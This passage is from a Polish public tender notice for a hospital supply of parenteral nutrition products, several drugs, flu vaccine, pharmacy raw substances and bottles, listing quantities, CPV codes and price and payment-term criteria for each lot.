<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 1: Worki dwukomorowe do żywienia pozajelitowego 1000 ml worek - 40 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr. 2: Worki dwukomorowe do żywienia pozajelitowego 2000 ml	worek	 - 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 3: Roztwór aminokwasów  8-10% 500 ml fl. - 360 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad nr 4: Roztwór aminokwasów 6-10%  500 ml fl. - 400 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 5:	
- Emulsja tłuszczowa 20% 100 ml	worek	 - 48 szt.
- Emulsja tłuszczowa 20% 500 ml	worek - 20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad nr 6: Witaminy rozpuszczalne w wodzie i tłuszczach do podawania dożylnego  dla dorosłych, 0,75g lub 10 ml fiol. - 1300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 7: Worki 3-komorowe do podawania przez żyły obwodowe 1250-1500 ml	worki	- 80 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 8: Worki 3-komorowe do podawania przez żyły obwodowe 1850-2000ml worki - 80 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 9: Worki 3-komorowe do podawania przez żyłę centralną 1500-2053 ml worki - 80
szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 10: 
- Witaminy rozpuszczalne w wodzie  10ml	fiol.	- 300 szt.
- Witaminy rozpuszczalne w tłuszczach  10ml fiol. - 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 11: Worki 3-komorowe do podawania przez żyłę centralną 1000-1026 ml	worki	- 20
szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 12: Preparat zawierający minimum 9 pierwiastków  śladowych 10 - 40ml	fiol.	- 1200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 13: Koncentrat do sporządzania roztworu do infuzji 20 ml fiol. - 400 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 14:
- 20% roztwór alanylo-glutaminy 50ml	fl. - 100 szt.
- 10% emulsja tłuszczowa 50ml	fl.	- 350 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 15: 
- Worki 3-komorowe do podawania przez żyłę centralną 493 ml	worki	- 400 szt.
- Worki 3-komorowe do podawania przez żyłę centralną 986ml	worki	- 200 szt.
- Worki 3-komorowe do podawania przez żyłę centralną 1477ml	worki	- 500 szt.
- Worki 3-komorowe do podawania przez żyłę centralną 1970ml	worki	- 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 16: 
- Worki 3-komorowe do podawania przez żyły obwodowe 1206ml	worki	- 200 szt
- Worki 3-komorowe do podawania przez żyły obwodowe 1904ml	worki	- 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 17: 
- Worki 3-komorowe do podawania przez żyłę centralna 625ml worki - 200 szt.
- Worki 3-komorowe do podawania przez żyłę centralna, 1250ml worki	- 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet I - Dostawa preparatów oraz witamin dla dzieci do żywienia pozajelitowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 18: 
- Emulsja tłuszczowa 20% 100 ml	op.	- 100 szt.
- Roztwór aminokwasów 10 % bez elektrolitów 100 ml	fl.	- 200 szt.
- Witaminy rozpuszczalne w wodzie  10 ml	fiol.	- 200 szt.
- Witaminy rozpuszczalne w tłuszczach  10 ml	fiol.	- 200 szt.
- Koncentrat pierwiastków śladowych  10ml	fiol.	- 20 szt.
- Natr. Chlorati inj. 0,9% butelka z dwoma portami 250 ml butelka	- 1000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.22.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet II - Dostawa leku przeciwzakrzepowego o nazwie międzynarodowej Antithrombinum III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Antithrombinum III:
-	inj.500 j.m. 1 fiol. +rozp.	op.	- 20 szt.
- 	inj.1000 j.m. 1fiol.+rozp.	op.	- 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.62.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> III - Dostawa leku przeciwzakaźnego o nazwie międzynarodowej Ceftazidime.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ceftazidime:
- 	inj. i.m. i.v.  1 g  s.subs. 1 fiol.	op.	- 600 szt.
-       inj. i.m.iv .0,25g s.subst. 1 fiol.	op.	- 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.65.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet IV - Dostawa szczepionki przeciw grypie na sezon 2015/2016,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> INFLUENZA VACCINE       
Szczepionka p/grypie na sezon 2015/2016-szczepy zgodne z zaleceniami WHO i UE	inj. im,sc  0,5ml (1 dawka dla dorosłych)	amp-strzyk.	 - 178 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.65.16.60-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet V -  Dostawa leku stosowanego w procedurze leczenia przewlekłego wzw u dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Peginterferonum alfa 2b Półautomatyczny wstrzykiwacz proszek i rozpuszczalnik do sporządzania roztworu do wstrzykiwań  0,05mg/0,5ml	zestaw - 48 szt.
- Ribavirinum kaps. twarde  200mg  140 szt. op.	- 3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.65.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet VI -  Dostawa surowców farmaceutycznych (substancji do receptury),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	ACIDUM BORICUM 	100 G	op.	- 15 szt.
2	ACIDUM SALICYLICUM 	100 G	op.	- 1 szt.
3	ADEPS SUILLUS	  50 G	op.	- 25 szt.
4	AMINOPHYLLINUM  	10 G	op.	- 1 szt.
5	AQUA CALCIS	 100 G	op.	- 1 szt.
6	ARGENTUM NIRTICUM 	 10 G	op.	- 15 szt.
7	BENZOCAINUM (ANAESTHESINUM)      10 G	op.	- 1 szt.
8	BISMUTHUM SUBGALLICUM    	50 G	op.	- 2 szt.
9	CALCIUM CARBONICUM PRAECIP.        	  100 G	op.	- 1 szt.
10	COFFEINUM  PURUM   	 10 G	op.	- 2 szt.
11	DETREOMYCINUM   	1G	op.	- 5 szt.
12	DIMETICONUM 350 	100 ML	op.	- 1 szt.
13	EPHEDRINUM HYDROCHLORICUM     	1G	op.	- 2 szt.
14	EUCERINUM  	 500 G	op.	- 16 szt
15	FORMALINA  	35-40% PŁYN     1000 ML	op.	- 5 szt.
16	FORMALINA 	10% PŁYN 1000 ML	op.	- 850 szt.
17	GENTAMICIN SULFAS 	 1 G	op.	- 5 szt.
18	GLUCOSUM SUBST.	 1KG	op.	- 160 szt.
19	GLYCEROLUM	 85-86% 1KG	op.	- 7 szt.
20	LEKOBAZA PODŁOŻE  	250 G 	op.	- 1 szt.
21	HYDROCORTISONUM 	10G	op.	- 20 szt.
22	HYDROGENIUM PEROXYDATUM  (PERHYDROL) 	30% 1KG	op.	- 1 szt.
23	JODUM PURUM 	 5 G	op.	- 2 szt.
24	KALIUM BROMATUM 	 250 G	op.	- 4 szt.
25	KALIUM GUAJACOLOSULFONICUM        	100 G	op.	- 20 szt.
26	KALIUM HYPERMANGANICUM 	 5 G	op.	- 10 szt.
27	KALIUM JODATUM	 10 G	op.	- 2 szt. 
28	LACTOSUM  ANHYDRICUM         	 100 G	op.	- 1 szt.
29	LANOLINUM ANHYDRICUM     	 0,5 KG	op.	- 30 szt.
30	MAGNESIUM SULFURICUM   	 100 G	op.	- 1 szt.
31	MAŚĆ CHOLESTEROLOWA 	3% 100 G 	op.	- 5 szt.
32	MENTHOLUM   	25 G	op.	- 1 szt.
33	METRONIDAZOL 	 25 G	op.	- 45 szt.
34	NATRIUM  BIBORICUM   	 1000 G	op.	- 7 szt. 
35	NATRIUM BENZOICUM	 100 G	op.	- 40 szt.
36	NATRIUM BICARBONICUM      	1000 G	op.	- 4 szt.
37	NATRIUM BROMATUM 	 250G	op.	- 40 szt.
38	NATRIUM CHLORATUM 	 1000 G	op.	- 2 szt.
39	NEOMYCINUM SULFURICUM    	 5 G	op.	- 30 szt.
40	OLEUM CACAO 	 1000 G     (rozkruszone )	op.	- 8 szt.
41	PAPAVERINUM HYDROCHLORICUM        	 5 G	op.	- 1 szt.
42	PARAFFINUM LIQUID 	0,8 KG	op.	- 20 szt.
43	PIX LIQUIDA PINI  	 25 G	op.	- 1 szt.
44	FIOLET KRYSTALICZNY (PYOCTANINUM ) 	10 G	op.	- 1 szt.
45	PYRALGINUM	 100 G	op.	- 1 szt.
46	RIVANOLUM 	ROZTWÓR 0,1% 250 G	op.	- 200 szt
47	RIVANOLUM	 ROZTWÓR 0,1% 500 G	op.	- 200 szt.
48	RIVANOLUM 	SUBS. 10 G	op.	- 10 szt.
49	SAPO KALINUS  	100 G PŁYN	op.	- 1 szt.
50	SOL. JODI SPIR.( JODYNA ) 	3% 10 G	op.	- 80 szt.
51	SOL. JODI SPIR. ( JODYNA )  	3%   800 G	op.	- 15 szt.
52	SPIR. ROZTWÓR GENCJANY 	1% 20 ML	op.	- 25 szt.
53	WODNY  ROZTWÓR GENCJANY 	1% 20 G	op.	- 25 szt.
54	SPIR.SALICYLOWY	 2%  800 G	op.	- 40 szt.
55	SULFUR PRAECIPITATUM 	100 G	op.	- 8 szt.
56	TALCUM  	100 G	op.	- 2 szt.
57	TINCT.VALERIANAE 	800 G	op.	- 30 szt.
58	VASELINUM  ALBUM 	 0,5 KG	op.	- 30 szt.
59	VASELINUM  FLAVUM  	 0,25KG	op.	- 10 szt.
60	WODA UTLENIONA	 3% 100 G	op.	- 100 szt.
61	WODA UTLENIONA 	3% 500 G	op.	- 300 szt.
62	WODA UTLENIONA 	3% 1000 G	op.	- 150 szt.
63	ZINCUM OXYDATUM	 100 G	op.	- 5 szt.
64	PHENOBARBITALUM  NATR.	5 G	op.	- 50 szt.
65	CHLORHEXIDINUM GLUCONICUM	 20% 500 ML	op.	- 30 szt.
66	NEOSPASMINUM	 1250 G	op.	- 30 szt.
67	SULFAGUANIDINUM	 100 G	op.	- 1 szt.
68	TINC. ADONIDIS VERNALIS  	250 G	op.	- 100 szt.
69	TINCT.CONVALARIAE M. 	250 G	op.	- 100 szt.
70	SOL.ACIDI BORICI 	3% 200 G	op.	- 150 szt. 
71	SOL.ACIDI BORICI 	3%  1000 G	op.	- 100 szt.
72	SPIRYTUS 70% SKAŻONY HIBITANEM (antyseptyk do dezynfekcji pola operacyjnego)	0,5% PŁYN 1000 ML    	op.	- 80 szt.
73	ETHANOLUM ( do receptury)	96%  800 G 	op.	- 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet VII -  Dostawa benzyny aptecznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Benzyna apteczna (do celów farmaceutycznych):
- płyn 100 ml	op	- 10 szt.
- plyn 1000 ml	op.	- 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 1;
1	Butelka apteczna (przyciemniona) 10ml O 18mm	- szt.	200
2	Butelka apteczna (przyciemniona) 20ml O 18mm	- szt.	100
3	Butelka apteczna (przyciemniona) 30ml O 18mm	- szt.	50
4	Butelka apteczna (przyciemniona) 50ml O 18mm	- szt.	20
5	Nakrętka na butelkę O 18mm do butelek z poz.1-4	- szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 2:
1	Butelka apteczna (przyciemniona) 100ml O 28mm	- szt.	100
2	Butelka apteczna (przyciemniona) 200ml O 28mm	- szt.	200
3	Nakrętka na butelkę  O28mm do butelek z poz.1,2	- szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. T - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 3:
1	Butelka apteczna (przyciemniona) 500ml O 28-32mm	- szt.	300
2	Butelka apteczna (przyciemniona) 1000ml O 28-32mm	- szt.	500
3	Nakrętka na butelkę O28-32mm do butelek z poz.1,2	- szt.	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 4:
1	Butelka sterylna 30ml z zakraplaczem 	- szt.	100
3	Butelka sterylna 10ml  z zakraplaczem 	- szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.30.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet VIII - Dostawa drobnych akcesoriów aptecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zad. nr 5:
1	Zakraplacze  O 18mm	- szt.	100
2	Zakraplacze sterylne   O 18mm	- szt.	100.</p></li>
